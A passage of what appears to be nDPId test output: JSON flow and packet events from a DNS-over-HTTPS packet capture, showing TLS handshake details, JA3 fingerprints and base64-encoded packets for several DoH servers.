{"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"rumpelsepp.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":172,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739312203,"flow_last_seen":946739312226,"flow_idle_time":7580000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1736,"flow_avg_l4_payload_len":868,"midstream":1,"thread_ts_msec":946739312226,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.203.179.248","src_port":41720,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"rumpelsepp.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
02434{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":946739312226,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946739312226,"pkt":"ZmZmZmZmRERERERECABFAAXUJ6NAADYGLgF0y7P4CgAAAQG7ovhHE08AaJwjAlAYAfWhygAAp6lKTcn83BQxpQ2W+POQkJxpRZXfacCT49dCzRTmvnt7\/eMDX1qsnmxcn8IW\/\/jaiVs0n6JrCEPqM3KpB310Ezncm8MGw7ZSfjBA5NhRsYZd6g\/lnjS76Li5236Ye\/OssNOz\/mjZ3Pxtb9lckb\/iUUI\/CTV\/O+8693wmOcz\/ttlVvcsf2F2cDnHv69Z9ZcBThvWSK1Fyp8msppNqA2rjumUxHY0NG8Y6Cz7YUFXsrxgVnCyIlXLFSqfPySagEMAo+BwG8r0qoeYlZ+taxtjBF+CPFNBs5wvSzuudNsLZAlsoLeVbC7V4nVAvK0ZozwjUaQXydZ7If0bf1gWwEwbOWvwXqAGoH05iR0Faj+nrSPK0l15jvP1ksCKE\/mIp4VHggNWOkJSAoQLhJ7eDNcolNe3VlYAesuTAoWHjzA4h2mXXEBGcexNswvAECexp5rG8zj4HDx39qgDVWk3o0eoSeBD1Uedt57E3iKOheQuYjuGPkNLW\/CT1EKc1xsQFJaPuXeJntSsuTJIbn\/JmjGMrhs2EpgTuc4i6KbgNr+Dg8naPJNChEcAoURckVZ0QP1tlwwQ3au79pUNst+WdCcPkSU8h2p+dgHNltfLpGpzxtjAkiMDwJHlE7uKJfM3Jooj+j8pbChIDWDckUBPBe4tCMPlI9VbP7p8jHCN+Jbgx\/vlzb\/jhrZ3VmwNp1ed4spIYgJkRtqvwQ8Z+wh5eYA\/rsAfAyJTWCHM70B9AefRgCTo9QDWJRLYx1cy2\/Boia47DDoYb3uBS7QfII4eh4Kp0F4K7dkOLwQWThipleT\/tvJB91q4YO69guoqAikyr2u0R4I\/dsfO61jRS\/0OGcoHRfzyYT6Gw0389lH9EFy84qx0Src85OaD1tRwt6pfR9awywt5CBZe04hE0tSwRbw55PNLODVlESQS0e66OA\/M16o1ABO7aMZrc1JmwD6a7e6weEeFmAazedN8hZmlYv1tms5VSBekoNgGF0CPdRNH7+BWQQ\/oy6wbYcn9T8DbY3EESV3ngHV5p7hWwxUALrbhEOn\/rgSRIuWBulfZWiwjpGLHCmd25Lp9PvWu2ARh3jmQWx3LqaLBWQZ2RO9BztLQCxX\/fKF1FJ2Nxx5CvAx1deQyJI3ILd0FX\/RREt+JafDB83Cz6gQe6DiXexfTUxaiReu6RStMeEaz6P71JkxtuCl0MQOV+trcnTBAsrOiC0Pnp41ddFZ9LyjPw5Mwgkq5S8GDPbsUHU26OG2nr4C2Qc8pral7heokrRYgBHlPnskyAlkCxuL+0XPLYLPIRRcJ64nRekoDw2yg6gDPsz4RcMVRLhEiIfkrCTlBJmmDuRqLpZJpecdlBmRfFHNMXGB8i+H\/\/tNPFLdJAZryXO\/8h5nkH4Mq7yLQ6vkIR62sgbVPD0Qe836LfCEQO\/hxA9iWtbqSJ07ScNvoG2Czrtvhfwq400gs5KtFeBbk1AFnMyczsxPdl6tp142MbR3VLQmj78nlxilK51hORcV
Li9ktXxGEonuDfod4vDjaA3pJ\/0ADkZjstpvA2GHymd+GbXXXQzsOxrlPNaHDKM7gA5XeYsGBeDXesqay1VJZXsBwjzKmLHBEfMmuTQkRGywy3RBFrIumMzi24aTghRx9FA\/ZPDZtgNyArr3TSzkQB\/WYB0FDxqBDH7pfBnH8cJXOSx4GfComMuGBhw8lB8S7RS+Tun6aoozaQ7NOXFkWLUNwlMATJg\/u88xBUir9H293nJp613ia6G8KaLtsNZhb97810Q6p5rpfzJ8sEbxPvnOBsJoN2uNaptS39DLNaJ78nP1N\/6JenLJUIebOzoNXR4wfNgVp5Coyyjw8dfCFDyuNA5Oi18AcVmGaGj7TK82vR9gQ2IWuTm0sTMl0T1RNelk87ZLC7oqgqi01091WCo6H3\/T5HgzDHHgrz3hvSk8s9"} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":191,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317842,"flow_last_seen":946739317842,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739317842,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":60026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00843{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":946739317842,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":946739317842,"pkt":"REREREREZmZmZmZmCABFAAFDy\/NAAL0GDsoKAAABwx5eHOp6AbvJsoUZMUH8QlAYAfbjLAAAFgMBARYBAAESAwOCYT7eCU1xUXbhTPV2JlKPIHcY7sPH2WwKtpwnSeF8xyAex0Qk69Rnwb5oftgvyqN3KWFf9IzenmheX1LYHsKC9AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANZG9oLmZmbXVjLm5ldAAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACAw+TAbBBMqcOYtJZmoA1qcBE16Yt0ym3XOBLcMkrVpDQ=="} 
-00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":191,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317842,"flow_last_seen":946739317842,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739317842,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":60026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.ffmuc.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":191,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317842,"flow_last_seen":946739317842,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739317842,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":60026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.ffmuc.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
04399{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":192,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":946739317868,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739317868,"pkt":"ZmZmZmZmRERERERECABFAAuAyWFAADgGjB\/DHl4cCgAAAQG76noxQfxCybKGNFAQAfXtaQAAFgMDAHoCAAB2AwNkyl8ogzMlAhTUQA2TsMh7Q0Cc2\/3wZHCiwad1Z9NoaCAex0Qk69Rnwb5oftgvyqN3KWFf9IzenmheX1LYHsKC9BMCAAAuACsAAgMEADMAJAAdACD+8H0HbVGEEmZC5hZLdNizcuC\/0pRP3fgeIP4D\/GwhdRQDAwABARcDAwAkfwnuX6wEOZOBUTjar1eVwNX\/5E0Ocx7Di9qIEnerial2sCiHFwMDDDWV4W2nvLW+\/N2l4x6sJgc8wiYdu5HOhM21Gm3mnFcxKO2Ie6ZC8TBNY2Mpp7Yb5rcL6bqv3cZKl4w3lzpNGDKGTjZnaTdTckz2Zj9T\/bsrBq0FYycXELwNiLo2fX1zTKtRPyLUu0GGauan4AQwcaDjRQzNlNJGd6461bdar1412MhrLksAOF3Zz32PJXTXtFU1mwvYVqphcZDb4pPZ0N+gjj7dNR4S3YwPGEbwlcx1UcGfiv3pyH+UUZNMH5Baw9z+5KY9RTPE3Rfw1bhKsm9xadHFb6suVuYDZzfowFS+\/J7rFZVNyczZA\/78zcdYuuXbTxeDjPhOqxAoQDX7VF1HojbcFFzFMGuyikHPdDYckD+WeR5lbhzc\/IDh75MNMf\/KMikRmHFGsWSPgCfnHcJinGKvxJJW58RraOB\/5irkT41Kj2mTP7rHD5SNd2CjxOxspgfL21g9EgRySSvXC+1MOm1qzwLgfjx1ZGRqf62CTxE1WBGLSGVSBUD0U9VUbvm7X5SNczaQPf0VLn8L3p7i1Ks07MNKvx2UZUXfrd\/RU2JWlAdhuGfs4RK7IYupZ9gwETRs4hxHaE\/JmiH23lQ8LvM6OtMsbQ6PirB\/Qq+igXuyD0TY3sAc4gdxm+SJGHsDpdSKgD9SodG\/vExsIGp+Gl5tevJKVwUT0pGU9EjX1Bi1e0B1xZ5ye5cjD8jxqC6fGWDYbc0qUQnT6Ei3AwoDVwqGAF6EPjjKHUKSNJDHKDRweWDMJ8eQeivUqlu+lhWhCAE9lUvj8qFKlloewows6Y7yqVUmSPPw60JQ\/7KRplxJ3xUWU3++WylOr+8YCwNo64NgMLldroBbTf3wwNL5K2B8K2fa0ar2Xxz3JO0bcvkksssiMRLPicETirp6CaB0jh\/JBv+EtfNF9XlRRV3bVxTCpp5g2WrRk6UQuYXfLZgXXpvWsW3UQwQvcMLuqGRqk0Lrq45fax67cEa4ablkdoldX6BJdVjUPEVJmY\/4EAB6c5ffE2gmcKP798gpjRuEOsJHx7lU8XAha86w59XzXonwVhFiFEiku0\/ryBztip397enoLu3d\/DdWuO13MC2xztCFDC63o+OIx4LKccR2dUluAwyjMQHJH2QfKyLnH3gJwChS1jbNN6JjmBlIjJ5F5oE0c\/LLe7ZNRcNl04\/gPLP3X4Ig1u++FkuVZR4VffxYIDiKTeCsRjSq8xT0sFQrVMRqRExsxUpTFlLjgmk+4A5gz+AWsHQgXQDHpc8q+tpaaLw2T\/VxrMh
aAlTNwD0R+fPu6xqKcmZ7K4tPJ18rUG2cCEq2Vyx\/nZ5Bsb4X51YWHYwI\/b62OL85Ky892\/YpuTiyCwr\/n7zKZjbYHc3bE3kJITVYYhhm7SCsQwZLdboBPXK1hc5zPXoZ51+dKsAS5jlTrL7t90UaX+3d5RBjR5yWI+hwkpRHZC4YPu4wFBj9CS+kKkAjOdshMO3DBnfsoKT51IiDooH56PULR9jXPjPvXwHziEAOD5lKZLhl\/1PpgUaU+m0Qhb9DGdPkvd5L5MtmeN6AG3ojp00pWioyce1OEa+lwCX86DDB4V50XA8WSmUf8Ruv9dDKOkEto48W94o6jbWCBaVHLa30AI1sBDsLlVma26j5oIbiMjlGK8ArsP5ukW3ec2Ucyyw4OeOhYe4PTq7O8QJdyRJffrasJ10uS+VJlhZE6nntiGTZcHenBLx6mVY\/sNy\/xKxBzOkMpSKdjL8GC01HDHp6JDU\/ZHpm00Le70fm6tFZ9vCb5wPUsyYycjMTWmiSgMdLOaewpU9tlODZTwi8DEVWJyEa6fkCFWYdu3u0ydeu8NzIOlQcZ1lyy\/E5qNM0pqUIMKgu+I5sA\/1d+JmmvGoRZQYTQTUa3kxoSS7rPzyV28dHyfYsyZ6xH4xX0Te4M4ymNWY+c\/L9THfsDN\/oVSD593mlv7UAAlNYa3xzFv8UKd\/o0wqF1apADEX5sol\/96BK9yt++kADu5RkL3Q9suLz5lPpANm2QRRIs8Ow+4yzU\/7qCzwe3wQndBdO2mvPNrxNQWX0RWtNADT1hADdzQX8UO24dOXh4qk+iHH6bl8lfIvW8+qqcF2nRbvY6bMLSrGQokwAzcMtwiZdjIJEsFZPEIqPD7EZnzjfnQijrIF9Wn4vbTwPzBnADd1msbtKeSaVNdMJih6KLod12TaeDOeCDRiB61IfXV9dgIKfGFyMlxjk0+d6Grs+cJ7UQzYlQ0mX0vg3on5LNDK23JzvxJlO9RApmtXu0TOUl67cxwpSzAdhxbWvI8l0V4Ai4I3tdYPelpVFVsSo+cgXM3bWISOOqQjzDzqnRV3rpFOpKmYj18yo6Iw3eQgPQrdVloO5tfEf2RUtUbOK+ineibqkTHcOjvhuseYK31qZJs+iTw0+voLfLVtqWLppBhUR5ajc3xYiWsGOK3UP0Zb+9tGTDp7eUX5mpFIs5TGNFA+qxq204tT5KujsIYtCIDdSXn6JYPAXRTlwA4oEjKa3OoGb33tMMT9hVxCQHDLFOs45v41USfRH5jGOfkuc9t77jPR84y7jSr8tXiXsE5CuwKv3P7uF9BVlABkx3ZlxEIz4\/1UR7mzFGAx9K\/RIDlF6SxU6mh73+mMXE0JVkoSTGdIPiDILMtKbfWz72\/UvSW7dTt35fwXmnQwL7He\/RlLL0\/sjJ8vBxcVsv7+Y0XxXaeqzhRtNiCnRgUcTqfLUOJS8aBbh4HPdSKkdltzZb\/S5Lper3Z8zxxuZkIif3ZJ\/gz\/T0iQbX6Et9RMROBoUHjPg5pKYqkENDxoMG\/MC0WVGiX5R06OFe3s9dZ\/ozvLZvYcEZE7N7F5n9sPRwd+I+59lPh72uicIxFdChXuEOxCFU0V3rGzpol1Y\/VsMpTxsDCKvlfGj6qXugNMGkxmq51kciXtj75pUlzwIMe6kQUn2jTFnukdp6OPxrp0T4\/lDiC3VaK0fB4xi6LdOz\/EwCzEu7lICtRLOOwfKoiPsMnC\/K4Myo47r7qgooc6Dyct7xyGHbGYJon8e+PQMECksrlAXwIcA8LQoEysxirtgk51VSp5RdhUCampTO83NLVIjW6\/5AUld9ViiwVRqzLBg7wtcqkBPZd3uqzxG5sC5MeKaDzMg3QKygjiklub6zdiCWJK8V5PVpgiHBa0as\/kw\/NbzRIp8\/DH7U1o9eDK98CHzu8jiLgQ5n1w2IYkMJA1JpBIvlpsoUz6Qe08g4O6AzxZi5RyC6\
/8K7\/Ed0NrDjr+G1S6iNZ+qijE4QRaBke9Co9IWob47jnSAaxgFwziKOB2hnQn493UlWhwDwQZuENq4DusUKLl4gaZTo1LvBrcu9EW+pZ0sdlBNW+e5bo09BfXSYhwTQVczSoVWspRueOrFVGx29DRpvDMWXSToev+\/5dhguN8sE7\/6r6UStt1tBEq6JkIdV7o\/cGVmADZ9PpG+uKpSV95fJQxwhEgMidjt9Nuj7TkbtLKuomHY1OGt2HlKFszmF624Ixr0UPZ7oS0P3i\/BbBVqEJdJZsiVw4MhJvqQMjH63aJ9Ie4EL24xwrBjLm1YPTGhWjPxzGPCBhmgSj9u3DHYv7ANgf\/CwtQN4PY6wBmanZg8AFnKkxZzdFSDH5pdfVl85gHQh72n"} -00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":192,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739317842,"flow_last_seen":946739317868,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3187,"flow_avg_l4_payload_len":1593,"midstream":1,"thread_ts_msec":946739317868,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":60026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.ffmuc.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":192,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739317842,"flow_last_seen":946739317868,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3187,"flow_avg_l4_payload_len":1593,"midstream":1,"thread_ts_msec":946739317868,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":60026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.ffmuc.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 01484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":946739317869,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":814,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":814,"pkt_l4_len":780,"thread_ts_msec":946739317869,"pkt":"ZmZmZmZmRERERERECABFAAMgyWNAADgGlH3DHl4cCgAAAQG76noxQgeaybKGNFAYAfV6GQAACB\/j9FRzrXDeV1gMTvdtnDbaxVBoJBh9cy8pOcYrD8iqnoIgGbCFSCgUCuevEmCLqMD6ndxwNBjeWxvehtGcTzYfxO5MsUhftQ0+dqR1WhFRhDtmvuIG3Q\/1JnJ+iTTGKy7+d19ANVD5kJS2Kbw1kq1CCeKCETSjOhUhw85xD38cYnUuHGOyMgN3a57KOUyOmb4EwXoByM8BsVlxu1vc1oPozugCeie0GDWpbdeaEmjgROEgR6DsCHE32e8OUOXMw3\/fTV5lRZlHvoE+WIdAJO23JksMoSbzH5lXNpwBfPg5fllHB2gzZy73MltgSTbtU05NdkOcr1ZFoqdQ2V7wBDgCUult1m1frKnm9RbG5so0kMdI1K2imdVR2omx+E2ZIA0aLFwNHZ87uVzv\/27AUYdBTlcNoD9yJPyo52+VSIEhFJ+iC6HMt6T8vMgHE9t8doC6zzQ5PPfhV0Y\/wHOciEZ1QCJawdjeaWA1oK+LH3dEkeN+2N6ZvT6aGJRirsBAqqpY1jcHkYSWOu0YNfkmmhcDAwEZhRt19HF8btCDpTYJhT082yjULJw4KauCEpxSogJCDv0wIm\/nxsgKWJ5swMbqyuXpT7mdSSff3VOjrgPc6f4pSWMC0gPkidij6lKAHSShm5G9hfxPyAE5LFfSUSjOyv6KeU3qvvH\/y9kOCN3ZJI34MmNCSHjx7F7SwgBhT+XBQWcGdTlLW08ufWjBpFEV0wweQ+sorOCpyYk1BQhN7aPpwW+8cPmzhDQyCikmnIgsWh1OdzHEfXqnhQmoNEJoF7iPcZZ2Q5XdXc7TB5Nr97MOlFTANPGwh+Z0IQ0oeyTOBC76R3rCyPcgQuUbw2ZmngRvKZCro22Tf+lTL3RL8Wypoy8hNNZMukYZOxZV3pu1hHfTdtt5At2T9yMXAwMARRSoalzVajpzS8ANj2fKvjjGfm\/L7CaKj2s8TbmN14sqePDJ6R8MH8TM+nnzmnQKkuZgpCVkmHfyoZtoN5aVAw1RpWQU5w=="} 
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":222,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739336955,"flow_last_seen":946739336955,"flow_idle_time":7580000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739336955,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.233.106.232","src_port":46658,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00843{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":222,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":946739336955,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":338,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":338,"pkt_l4_len":304,"thread_ts_msec":946739336955,"pkt":"REREREREZmZmZmZmCABFAAFEM0dAAL0Go94KAAABuelq6LZCAbsgVVLXybMJllAYAfbmxAAAFgMBARcBAAETAwMcr1WdeadOHog3lEpiodEeAcm2gZJgU0L8O6YStA7tWSAYYApreqfeMV002xSAt2FZT+xN2PBaLBfkQPkpY2yRnAAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACkAAAAEwARAAAOZG5zLmRuc2hvbWUuZGUABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAgsGpq4zmMsA+1iGgtz9f+LYYNyHCIQZ\/zq3SyFDX6FwI="} 
-00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739336955,"flow_last_seen":946739336955,"flow_idle_time":7580000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739336955,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.233.106.232","src_port":46658,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.dnshome.de","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739336955,"flow_last_seen":946739336955,"flow_idle_time":7580000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739336955,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.233.106.232","src_port":46658,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.dnshome.de","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
04395{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":946739336992,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739336992,"pkt":"ZmZmZmZmRERERERECABFAAuAvuxAADkGkf256WroCgAAAQG7tkLJswmWIFVT81AYAfXxAAAAFgMDAHoCAAB2AwOH51VjdKQ\/AZQoSOmoC7jYQ9n9NqAbTWqEvktHdZeP0yAYYApreqfeMV002xSAt2FZT+xN2PBaLBfkQPkpY2yRnBMCAAAuACsAAgMEADMAJAAdACBHlT\/ckNv1zu+YfSt\/zxC2rtSjIy\/UHNmUMGM8UGyVRxQDAwABARcDAwAgwilHvuszxY2P55AdC9vc0WNmaI98gk9UASFHh+rOkuIXAwMLGSaHw6LineCaEcA9j88fiSZ7p3jmYBOCmFwXmWuJbNVbDX18tcQr3ZATZwug3WdQUgZQuGPbLNtio7ePY9WJu1m+mcBvlmSf8p+kNIdmks3LygnPjDC2c6UxorLMoKdZpIF74n0UwdI1haIk7t9SxqKBNHhLqhVzXfA\/gYf10GXPi1hxhIDRS0KcW02uf1aHSSQNM4lfDYD4RpVTTVdscI7J3G592b5BxWNyVv0Whq0mJ6igzcGRSA9ve9GnhfQ7PQUMhLbnBs6Wh4\/E06aah5j\/y2NN9Rc5DR0mq07rU5Ce+\/XxD4lUU+ekKKMEv73SbncelyWJ8Y5vAOXrDEqq81ak\/UBhx9qx8\/JbLt7htRmRK4POVPXjov3f3Cr0\/J9vWUZrGJZBIzd1UHWlYZqWZ2e4zJnIzt4CgmUiyp0aneIGvtzNkXr50R32ENIRIAFyE695Wqs8jERpSPGsHn3huPrLifotNcrG9GhWfn+P06Pt7D4zUiFfvh+LyEBgC4g9mLo7FFTR9ZBh4cvU6KR2JbkcthJ2\/eit4GXyWKglPq9JYKNPyFUXXYoA+haf0kKxXZykljYvB6S+pRhq5fgW9P0TnapNy0IoETL\/FsgOgMCO0tJLa6wJ+moPbCUrnqhRlYqM1pTafI1RDq9YRk8QTG21gC3tmzmBSfh\/ZYdFQXZmYXvWfFwGRjyPIT9+zMlqq2Pdp2JskHpsbB\/FwB1MOL4EMGO2rEvqAN\/G+LUDaZwDQErYmrvokCqs5wzQjVzO+vQiri8OiX7KtSVymFdc3QbFXkOIAgL4ZCdwmcaz\/rCx33yioKUWWt5qTqCZ9pmtXhl4HcAp8XhgUIEYBgprpf\/Ti2fp0ElRAFLFXlwNoLI9iggooHHGhx21Tg5YhcbP60KH\/320Ma9w9iPFEDojm9a7Uksk9S+uRWv4OhUAAYKjuWZotkEozfx2xPJWhN+3nf+Iha6M\/PTSY3MMhm1WzIZxhGYM104LxfJgMU8G9gWojlgvjhJ9uq3S6TQd83u3bJfgu1uC+MqFUVxe5NSUl7ikQ0I2+aFOcROfwG1sC6mO3ReC1pSOUUz4gO3A9SSBBDyhLMPE7cirAIcpsT33LqFeeSDEu0N967vwR6xVh0M7jpo7PUXyGgThPlyiOpRF9s8WGXtAs8kIwGDjwgfzhZb+5Ica\/Es\/V\/D